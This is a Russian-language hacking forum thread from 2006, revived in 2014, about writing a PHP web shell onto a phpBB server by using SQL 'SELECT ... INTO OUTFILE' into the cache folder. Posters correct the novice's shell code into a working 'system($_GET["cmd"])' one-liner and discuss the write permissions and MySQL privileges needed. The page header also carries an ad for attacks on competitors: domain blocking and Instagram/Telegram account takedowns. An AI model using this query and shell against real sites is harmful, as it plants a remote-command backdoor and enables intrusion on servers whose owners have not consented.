Заливка шелла через БД

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Заливка шелла через БД

Опции темы

Поиск в этой теме

Опции просмотра

Заливка шелла через БД

01.07.2006, 15:03

Tosic

Новичок

Регистрация: 11.04.2006

Сообщений: 9

С нами: 10569776

Репутация: -2

Заливка шелла через БД

подскажите пожалуйста как правильно выкачать шелл из БД в файл на сервере, мои попытки не увенчались успехом, так как при выборке в файл чего-то символы заменяются их кодом
вот пример как я вытаскивал шелл
SELECT cat_title INTO OUTFILE 'раскрытый путь/phpbb/cache/shell.php' FROM phpbb_categories where cat_id=1; - это пример
как лучше оформить запрос или что нужно вписать в БД
текст шелла: <?p system("$_GET[cmd]"); ?>

𝕏 Twitter Reddit Telegram Копировать ссылку

03.07.2006, 00:36

1ten0.0net1

Time out

Регистрация: 28.11.2005

Сообщений: 547

С нами: 10762826

Репутация: 1348

1) Проверь - разрешена ли запись в папку cache;
2) Шелл - не <?p... , а <?php...;
3) Кавычками обрамлять надо cmd, а не весь текст в скобках (да и то невсегда).

03.07.2006, 07:00

banall

Познающий

Регистрация: 25.06.2006

Сообщений: 55

С нами: 10462265

Репутация: 0

Цитата:

Сообщение от 1ten0.0net1

Нифига не получиться форум в сафе режиме можно только через фтп или ищи открытую папку можно не на форуме. Т.к. весь форум закрыт на запись.

03.07.2006, 13:02

~~ZaCo~~

Banned

Регистрация: 20.06.2005

Сообщений: 880

С нами: 10994966

Репутация: 1332

>>Нифига не получиться форум в сафе режиме
никакой связи между сафе модом в пхп и мускл сервером нет. запросы отсылаются? - отсылаюстся. стало быть достаточно чтобы текущий юзер мускул сервера обльадал необходимыми привилегиями - о них уже писали, и не только на форуме.

03.07.2006, 21:59

Dw@d

Новичок

Регистрация: 22.01.2006

Сообщений: 23

С нами: 10683188

Репутация: 9

Цитата:

<?p system("$_GET[cmd]"); ?>

лол )))))) такой код никогда и не заработает

03.07.2006, 22:42

Zadoxlik

Постоянный

Регистрация: 28.02.2005

Сообщений: 853

С нами: 11156006

Репутация: 749

Как я понял, там стоит phpBB. Тоды тебе сюда:
1
2

04.07.2006, 08:53

Tosic

Новичок

Регистрация: 11.04.2006

Сообщений: 9

С нами: 10569776

Репутация: -2

спасибо, что указали на ошибки, так как я недавно практикую с хакингом, просто ради интереса.
как я понял код должен быть таким:
<?php system($_GET["cmd"]); ?>
правильно?

04.07.2006, 09:42

Nova

OpenVPN.CC

Регистрация: 15.07.2005

Сообщений: 1,599

С нами: 10958786

Репутация: 1034

Лол млин учись нормально код делать

или так

Код:

<? system(GET['cmd']); ?>

или так

Код:

<?php system(GET['cmd']); ?>

10.09.2014, 01:20

look2009

Новичок

Регистрация: 03.06.2009

Сообщений: 2

С нами: 8915353

Репутация: 0

Ну раз уж тема в индексе по запросу заливка шелла через БД, то подниму и дополню

Сам всё зальёт, если этот файл залили, то вызовем его для заливки шелла, тем более путь по любому нужен.

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Заливка шелла Ipb 2.1.6	banall	Уязвимости CMS / форумов	9	01.11.2006 14:12
Заливка шелла в phpBB 2.0.9 через SQL	bandera	Уязвимости CMS / форумов	13	06.06.2006 19:19
Способы загрузки шелла через картнику	1ten0.0net1	Уязвимости CMS / форумов	16	27.03.2006 14:02
Заливка шелла на phpBB 2.0.6 через highlights	ded2006	Уязвимости CMS / форумов	22	12.01.2006 07:29
Заливка шелла и снятие бана в ipb через mysql	darks	Уязвимости CMS / форумов	14	26.11.2005 00:03

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход